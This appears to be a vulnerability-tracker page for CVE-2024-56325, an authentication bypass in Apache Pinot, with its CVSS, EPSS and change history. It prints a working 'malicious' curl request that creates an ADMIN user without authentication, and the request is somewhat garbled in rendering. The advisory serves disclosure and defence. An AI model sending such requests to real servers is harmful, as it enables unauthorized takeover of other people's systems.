Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users


Return: {"code":401,"error":"HTTP 401 Unauthorized"}


Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .


Return: {"users":{}}





A new user gets added bypassing authentication, enabling the user to control Pinot.
Fixes

Solution

No solution given by the vendor.


Workaround

No workaround given by the vendor.

History

Wed, 16 Jul 2025 13:45:00 +0000

Type Values Removed Values Added
Metrics epss

{'score': 0.05128}

epss

{'score': 0.04959}


Tue, 15 Jul 2025 20:00:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache pinot
CPEs cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:*
Vendors & Products Apache
Apache pinot

Fri, 18 Apr 2025 15:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Tue, 01 Apr 2025 10:45:00 +0000

Type Values Removed Values Added
References

Tue, 01 Apr 2025 09:15:00 +0000

Type Values Removed Values Added
Description Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Title Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
Weaknesses CWE-288
References

cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2025-04-18T14:24:14.801Z

Reserved: 2024-12-19T14:28:37.532Z

Link: CVE-2024-56325

cve-icon Vulnrichment

Updated: 2025-04-01T10:03:56.094Z

cve-icon NVD

Status : Analyzed

Published: 2025-04-01T09:15:15.240

Modified: 2025-07-15T19:49:46.407

Link: CVE-2024-56325

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

No data.